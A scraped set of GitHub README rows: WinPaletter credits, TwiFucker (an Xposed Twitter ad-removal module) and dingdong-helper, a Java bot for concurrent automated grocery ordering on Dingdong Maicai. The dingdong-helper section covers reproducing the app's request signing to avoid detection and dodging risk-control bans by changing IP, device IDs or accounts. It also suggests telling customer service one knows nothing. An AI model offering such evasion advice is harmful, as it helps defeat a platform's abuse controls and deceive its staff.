- [3D and flat degrees modification in 3D objects (Classic Colors) is inspired by Desktop Architect](https://en.wikipedia.org/wiki/Desktop_Architect)
- [Colors picking controls by Cyotek](https://github.com/cyotek/Cyotek.Windows.Forms.ColorPicker)
- [Image to palette conversion mechanism by ColorThief, developed by KSemenenko](https://github.com/KSemenenko/ColorThief)
- [Bitmap effects powered by ImageProcessor](https://imageprocessor.org)
- [Bitmaps to cursors conversion mechanism developed by Evan Olds](https://github.com/evanolds/AnimCur)
- [Retrieving elements of Windows XP visual styles (*.msstyles) using the Advanced UxTheme wrapper](https://www.codeproject.com/Articles/18603/Advanced-UxTheme-wrapper)
- [Extracting elements from visual styles (*.msstyles) using nptr/msstyleEditor](https://github.com/nptr/msstyleEditor)
- [Patching PE files by Ressy, developed by Tyrrrz](https://github.com/Tyrrrz/Ressy)
- [Handling JSON files using Newtonsoft JSON by James Newton-King](https://github.com/JamesNK/Newtonsoft.Json)
- [Processing and handling command lines arguments by CommandLineParser](https://github.com/commandlineparser/commandline)
- [Icons designed by Pichon](https://icons8.com/app/windows)
- [Animation and transition effects for controls by FluentTransitions, developed by Andreas Wäscher](https://github.com/awaescher/FluentTransitions)
- [Animation for Controls by Pavel Torgashov](https://www.codeproject.com/Articles/548769/Animator-for-WinForms)
- [Modern dialogs design (messages boxes) by Ookii.Dialogs.WinForms](https://github.com/ookii-dialogs/ookii-dialogs-winforms)
- [Using JetBrainsMono as a monospaced font for WinPaletter](https://github.com/JetBrains/JetBrainsMono)
- [These items are provided by Microsoft: Classic color schemes, Luna theme preview (Luna.msstyles) and Command Prompt and PowerShell raster fonts previews](https://www.microsoft.com)
## ![alt text](https://github.com/Abdelrhman-AK/WinPaletter/blob/master/Media/Mini-Icons/License.png?raw=true) License
WinPaletter is licensed under the [MIT/LGPL Dual License](https://github.com/Abdelrhman-AK/WinPaletter/blob/master/License.md). Feel free to use, modify, and distribute it in accordance with the terms of the license.
| Advanced Windows Appearance Editor | windows10,windows11,theme,windows7,windows8-1,cursors,logonui,windows-classic,command-prompt,powershell | 40 | 8 | 16 | 1,289 | 11 | 1 | 1 |
Dr-TSNG/TwiFucker | <p align="center">
<img src="./app/src/main/res/mipmap-xxxhdpi/ic_launcher.png" width="150">
</p>
<h1 align="center">TwiFucker</h1>
<div align="center">
### Yet Another Adkiller for Twitter
[![author][author-image]][author-url]
[![release][release-image]][release-url]
[![last commit][last-commit-image]][last-commit-url]
English | [Indonesia](README_IN.md) | [日本語](README_JA.md)
##
<a href="https://t.me/TwiFucker"><img src="https://img.shields.io/badge/Telegram-2CA5E0?style=for-the-badge&logo=telegram&logoColor=white" alt="Join TwiFucker Telegram Group"></a>
⚠️ This is an Xposed module. Supports only API 93+ ⚠️
You can find the Beta version / Rootless integration (automatically embeds the latest Twitter with [LSPatch](https://github.com/LSPosed/LSPatch)) on our Telegram channel
[author-image]: https://img.shields.io/badge/author-Nullptr-blue.svg
[author-url]: https://github.com/Dr-TSNG
[release-image]: https://img.shields.io/github/v/release/Dr-TSNG/TwiFucker?color=blue
[release-url]: https://github.com/Dr-TSNG/TwiFucker/releases/latest
[last-commit-image]: https://img.shields.io/github/last-commit/Dr-TSNG/TwiFucker?label=last%20commit
[last-commit-url]: https://github.com/Dr-TSNG/TwiFucker/commits
</div>
##
## 🚫 This project is currently discontinued due to [shameless plagiarism](https://t.me/TwiFucker/475)
### ⚠️ Copyright Notice
What we hate most is the modification of our texts, especially our **MODULE TITLE**, which clearly means they want others to think all the work was done by THEM, even though they contributed NOTHING to the module's development.
We are not opposed to integrating our module in your client, but we strongly condemn the behavior of **modifying our texts and hiding our author info**.
Although our project was open source before, we never set up a license, so **ALL RIGHTS RESERVED**. From now on we decline ANY modification or pre-patched client. It's fine if you LSPatch Twitter with our module yourself, but you should not release your patched apk anywhere.
<details>
<summary><h2>✨ Features</h2></summary>
<div align="center">
## Remove promoted content
<img alt="promoted tweet" src="./images/promoted_tweet.webp" width="256" />
## Remove promoted users
<img alt="who to follow" src="./images/who_to_follow.webp" width="256" /> <img alt="who to follow in explore" src="./images/who_to_follow_explore.webp" width="256" />
## Remove promoted trends
<img alt="promoted trends" src="./images/promoted_trends.webp" width="256" />
## Remove sensitive media warning
<img alt="sensitive media warning" src="./images/sensitive_media_warning.webp" width="256" />
## Disable recommended users
<img alt="recommended users" src="./images/recommended_users.webp" width="256" />
## Copyable alt text
<img alt="copyable alt text" src="./images/copyable_alt_text.webp" width="256" />
## Download media menu
<img alt="download menu share" src="./images/download_menu_share.webp" width="256" /> <img alt="download menu" src="./images/download_menu.webp" width="256" />
## Hide drawer items
<img alt="hide drawer items" src="./images/hide_drawer_items.webp" width="256" />
Slightly broken due to Twitter's new drawer layout.
## Hide navigation bar items
<img alt="hide navigation bar items" src="./images/hide_navigation_bar_items.webp" width="256" />
## Disable url redirect
Prevent Twitter redirect from `t.co` to target link when clicking on a link in Twitter.
## Disable Threads (live content)
<img alt="disable threads" src="./images/disable_threads.webp" width="256" />
## Disable Tweet Detail Related Tweets
<img alt="disable tweet detail related tweets" src="./images/disable_tweet_detail_related_tweets.webp" width="256" />
## Remove video carousel
<img alt="remove video carousel" src="./images/video_carousel.webp" width="256" />
## Feature switch
Force enable/disable Twitter experimental features.
## Disable banner view
<img alt="disable banner view" src="./images/disable_banner_view.webp" width="256" />
</details>
## 🛠️ Usage
- Long tap Twitter logo at top of the Twitter home screen OR
- `Settings and privacy` > `Additional resources` > Tap version
## 🚀 Stargazers over time
[![Stargazers over time](https://starchart.cc/Dr-TSNG/TwiFucker.svg)](https://starchart.cc/Dr-TSNG/TwiFucker)
| Yet Another Adkiller for Twitter | android,twitter,xposed | 14 | 17 | 71 | 285 | 20 | 1 | 3 |
JannsenYang/dingdong-helper | # dingdong-helper
Automatic ordering for Dingdong Maicai (叮咚买菜) using concurrent API calls. Multiple users report successful orders within 10 seconds in practice. Automatically places an order for everything in the cart that can be bought; you only need to fill the cart yourself and complete the final payment.
As of 2022-04-19, based on my own experience and feedback from friends, orders are going through normally, but I cannot guarantee that everyone will succeed. If this program becomes completely unusable, I will post an update right here.
This project looks like it is coming to an end. Where I live, group-buying groceries is now easy and much cheaper than Dingdong; Dingdong keeps getting more expensive and carries fewer and fewer products, and I won't speculate about the reasons. Updates and replies will no longer be frequent. If you have major improvements, feel free to fork this project, make the changes, and leave a note in the issues so more people in need can use them. Thanks for everyone's support.
# Major update! Major update! Major update! Current mini-program version: 2.83.0
The signing algorithm has been fully reproduced (use JDK 1.8; higher JDK versions do not include this feature), so request parameters are identical to a real device. Requests previously contained signature fields that the backend did not verify; to avoid leaving anything that could be used against us, I put my solid JS skills to work, and requests are now exactly the same as the mini-program's, with no differing parameters.
# About account bans
Quite a few people in the issues reported today that they could not place orders; based on my own experience and friends' feedback this has not happened to us. I still recommend using the time triggers at 5:59 and 8:29 and running for 2 minutes; if you don't get anything, don't keep running it. My apologies to those who have been hit by risk control.
Use with caution if you are worried about being banned.
Avoid the following:
1. Do not run the concurrent program for more than 2 minutes (waiting time before a time trigger does not count).
2. Do not use the concurrent program during off-peak hours, especially when the cart is empty or no delivery slot is available. If an order goes through, fine; if not, during off-peak hours all those concurrent requests are actually processed by Dingdong's servers and you are very likely to be flagged by risk control. During peak hours the rate-limiting policy simply drops the requests without processing them.
3. Do not place more than two orders per day. Sometimes the third order of the morning cannot be paid but works again in the afternoon; some people report the second order already cannot be paid. Trying again the next day will tell you whether the problem is caused by placing too many orders.
4. Use sentinel mode with caution: do not run it for more than 3 hours, and increase the request and polling intervals as much as possible.
Things to try:
1. Wait a while and try again.
2. Log in again.
3. Change your IP: restart your home broadband modem (the one provided by the carrier, not a router you bought yourself) or use your phone's mobile-network hotspot.
4. According to feedback in the issues, some people succeeded after changing device_id and open_id; the backend does not validate these two parameters.
5. Call customer service (based on experience with other platforms, be fully confident and just say you don't know anything).
6. Switch to a different account.
# Important notes
1. This program exists only to help programmers in Shanghai who urgently need to buy groceries; do not use it commercially. I won't take part in non-technical discussions in the issues, nor will I stop anyone from having them.
2. Dingdong's policy is to refresh the day's delivery slots at 6:00 and 8:30, and products may be restocked at any time of day. So the best time to grab groceries is 6:00 (the first ordering window of the day). If delivery stays available between 6:00 and 8:30, nothing changes at 8:30; 8:30 mainly refreshes delivery slots, and you only need to grab a delivery slot then if delivery was unavailable before 8:30 (the second ordering window of the day). In short: at 6:00 you grab both stock and delivery, at 8:30 only delivery.
3. Do not delete the protection thread in Application. That code makes the program terminate automatically if no order has been placed after 2 minutes of concurrent execution, to avoid putting pressure on Dingdong's servers and to avoid bans.
4. If the API returns a 405 status there are 3 possibilities: 1. a one-off, nothing to do; 2. you have been running the program too long, see point 2 above; 3. the number of orders per account is sometimes limited, see point 3 above.
5. According to feedback, a small number of people see fake stock at their station, possibly to keep people from making a fuss: before ordering opens the items show up in the cart, but they simply cannot be bought, and many items vanish the instant ordering opens. It happened to me too: a cart worth several hundred yuan ended up as an order of a few dozen. I operated the cart manually in the app at the same time and the items really were out of stock, so it is not a problem with the program.
6. On 2022-04-12 my station started stocking items gradually from 6:00; before 6:00 there was nothing in the cart that could be bought.
## Environment
Since many users are not Java developers, here is a bit of beginner guidance; experienced developers can skip it.
1. IntelliJ IDEA. For beginners: download from https://www.jetbrains.com/idea/download/#section=windows and simply use the 30-day trial; let's pray life is back to normal within 30 days.
2. JDK 8. For beginners: go to https://www.oracle.com/java/technologies/downloads/#java8-windows, search for Java SE Development Kit 8u321, pick the build matching your OS and CPU, and install it.
3. Maven. For beginners: IDEA's built-in Maven is fine; nothing to configure.
4. Open IDEA - (File; on a first install skip this, you will see Open directly) - Open - the project folder - wait for the Maven build progress bar in the bottom-right corner.
5. Beginners should not create a new project and add files into it; just use step 4 and wait for the progress bar to finish. If you accidentally close the progress bar, delete the project, pull it again, and repeat step 4 (there are other ways, but they are hard for beginners, so not recommended).
6. If you downloaded the project as an archive and extracted it, watch out for folder nesting: the root of the folder you open must directly contain files and folders such as pom.xml, src, and so on.
A quick primer for those completely new to Java:
``` java
public class UserConfig { // UserConfig is the class name; when the docs below say "run Application", Application is a class name too
    // A class can have only one main method, which is the entry point. In IDEA, right-click this file and choose Run to execute the class.
    // If a class has no main method, there is no Run option; the Api class in this project has no main method.
    public static void main(String[] args) {
    }
}
```
## Steps
1. Use a packet-capture tool such as Charles (my screenshots and tutorial use Charles, which makes comparison easier) to capture the user information from the Dingdong Maicai mini-program's API requests in WeChat, and put it into UserConfig.java.
2. Run UserConfig.java to get the city id, station id and address id of the default delivery address, fill them into the corresponding variables, then run it once more to confirm the configuration is correct; log output will be shown.
3. Put the groceries you want to buy into the cart yourself via the app.
4. Choose one of execution modes 5-8 according to your needs.
5. Test mode (single-threaded): run ApplicationTest to place a single order during off-peak hours.
6. Manual execution (multi-threaded, concurrent): set the policy variable in Application to 1 and run it. If the cart has items and a delivery slot is available, it will complete within 10 seconds.
7. Time trigger (multi-threaded, concurrent): set the policy variable in Application to 2 or 3 and run it. It fires automatically when the system time reaches 5:59:30 or 8:29:30. If the purchase succeeds, an alert tone plays for one minute (make sure the computer's speakers are on and not muted).
8. Sentinel mode (single-threaded): set the minimum order amount in Sentinel and run it; it tries to place an order once the cart total exceeds that amount. Note that this mode is not concurrent, so around the 6:00 and 8:30 peaks it may be unable to order for a long time; for peak hours use strategy 6 or 7. If the purchase succeeds, an alert tone plays for one minute (make sure the computer's speakers are on and not muted). Quite a few people reported that running it for a long time can still lead to bans and similar problems; it happened to me yesterday after a few hours, and logging in again fixed it. After increasing the intervals it ran four or five hours without issues.
9. Wait for the program to finish. If an order is placed successfully, pay within 5 minutes or the order will be cancelled: open the Dingdong Maicai app on your phone - My Orders - Pending Payment - Pay.
10. Before each run, execute the main method in UserConfig to check that your login state is still valid; if not, capture packets again and update the UserConfig data.
11. If you want to use your own account to order for someone else, just set the default address manually in the app, run UserConfig to get the new addressId and stationId, and replace them.
12. If you want to test ordering, Shanghai is hard to test against; set the default address to Hangzhou for testing.
## Conditions under which the program stops automatically
1. There are no purchasable items in the cart (time-trigger and sentinel modes keep running).
2. An order is placed successfully.
3. The user's login information has expired.
## Quick packet capture
The mini-program now has a PC version: in the mini-program on your phone, tap the three dots in the top-right corner -> Open on computer. Here is a reference article: https://blog.csdn.net/z2181745/article/details/123002569. It is far more convenient than capturing packets on a phone.
Notes
1. Open (or reopen) the desktop Dingdong mini-program only after Charles is installed and configured; if it was opened beforehand you may not capture anything.
2. If you capture packets from the desktop mini-program, do not touch the Dingdong mini-program in WeChat on your phone, or the session will be invalidated, and vice versa. Other operations in the app are fine, but you cannot use the mini-program on both devices at the same time; they are mutually exclusive.
3. Make sure neither the computer nor the phone has a VPN enabled (corporate VPN or a proxy).
## Device roles (same as the steps above, but spelling out which device does what)
#### Phone & computer
1. Open Dingdong Maicai in the WeChat mini-program and capture the information with packet-capture software on the computer, then fill it into the code; it can be reused for as long as the token stays valid.
2. You can also capture packets from the desktop mini-program, which is much more convenient than using the phone.
#### Phone
1. Add items to the cart before ordering opens.
2. After an order is placed successfully, go to the pending-payment page to pay.
#### Computer
1. Run UserConfig to get the addressId and fill it into the addressId variable.
2. Run Application 1 minute before ordering opens. For the first 30 seconds or so it fetches basic information; once you see "order submission failed" messages, the basic information has been collected, and the order will go through as soon as the opening time arrives.
## Approach
Although we have plenty to eat at home, after a while I couldn't stand getting up every morning to fight for groceries; my hands were cramping from tapping and I still couldn't buy anything. Watching the items in my cart dwindle made me frantic, so as a programmer I had to rely on my own hands: I started after lunch and placed a successful order at 6 p.m.
1. Capturing the app's traffic didn't work.
2. Capturing the mini-program's traffic worked, but the mini-program login cannot be automated and the open id cannot be obtained, so that part has to be solved by capturing packets yourself. I also saw some signature-looking fields in the request parameters and thought: this is going to be a pain.
3. I planned to work out the signing by unpacking the WeChat mini-program and studying the signature-related code; if that failed I would look into hooking the app, but that takes far too much effort, so I kept it as a fallback.
4. I first wrote a request to fetch the address and found that the signature-looking parameters did not need to be sent at all, which saved a lot of effort. I should have used Charles breakpoints from the start to delete the parameters and repeat the request to see whether it works without a signature; I let myself be intimidated. Had I known, I could have skipped step 3.
5. I then worked through the parameters and steps needed to place an order; the amount of data is huge and made my eyes swim, so it takes care.
6. Seeing the order go through made me very happy. That's the fun of it.
Finally, I hope the epidemic ends soon and everyone can put food on the table.
## Changelog
### 2022.04.11
1. Added automatic selection of cart items.
2. Improved the messages shown when the gateway blocks requests for being too frequent or running for too long.
3. Added station-information confirmation when running UserConfig; incorrect station information causes the cart to show stock on the phone while the program sees no stock or cannot place an order.
### 2022.04.12
1. Dingdong changed the structure of error responses; updated the error log output.
2. Fixed coupons not being applied.
3. Fixed the case where delivery slots are clearly shown but ordering reports that the time slot cannot be delivered.
### 2022.04.13
1. Added sentinel mode for normal hours (long-interval, single-threaded): set a minimum order amount; after a successful order a ringtone plays for one minute, so set the computer volume to a suitable level.
2. Added two time-triggered runs (concurrent) at 5:59 and 8:29; to use them, set the policy variable in Application. After a successful order a ringtone plays for one minute, so set the computer volume to a suitable level.
3. Added a protection routine for concurrent execution: by default it runs concurrently for 2 minutes, to avoid bans and to reduce pressure on Dingdong's servers.
### 2022.04.14
1. Lengthening the interval between order submissions clearly reduced ordering efficiency (it took 30 seconds to succeed); reverted to the original configuration.
### 2022.04.15
1. The signing algorithm has been fully reproduced (use JDK 1.8; higher JDK versions do not include this feature), so request parameters are identical to a real device. Requests previously contained signature fields that the backend did not verify; to avoid leaving anything that could be used against us, I put my solid JS skills to work, and requests are now exactly the same as the mini-program's, with no differing parameters.
## Packet-capture screenshots - fill in your own information
These images sometimes fail to load; you can see the same thing directly in the project at image/headers.jpeg and body.jpeg, which correspond to the parameters of the headers and body methods in UserConfig.
![Request header info](https://github.com/JannsenYang/dingdong-helper/blob/05cc65034b062d3a7844ec706e7876f8e5a57586/image/headers.jpg)
![Request body info](https://github.com/JannsenYang/dingdong-helper/blob/0433cc7def733820d734f48dec6e47fc0f2d89c8/image/body.jpg)
## 2022-04-10 field record
Everyone who used it grabbed their order within seconds. I messed up myself: in order to push to GitHub I forgot to fill in the delivery address id before running, and only realized after a few minutes; I then added the response shown on failure.
![Field record 1](https://github.com/JannsenYang/dingdong-helper/blob/3f1847b6f5c363168de733380d9f3cb02a64b8a6/image/20220410-1.png)
![Field record 2](https://github.com/JannsenYang/dingdong-helper/blob/f6e20d377aa482063732a5be614e3dae3d4c5091/image/20220410-2.png)
### Copyright notice
**This project is licensed under GPL-3.0. All developers doing derivative development must comply with GPL-3.0, and the code must not be used for commercial purposes.**
| 叮咚自动下单 并发调用接口方式 多人高峰期实战反馈10秒以内成功 自动将购物车能买的商品全部下单 只需自行编辑购物车和最后支付即可 | ding-dong,dingdong,ding,dong | 0 | 3 | 10 | 154 | 171 | 1 | 0 |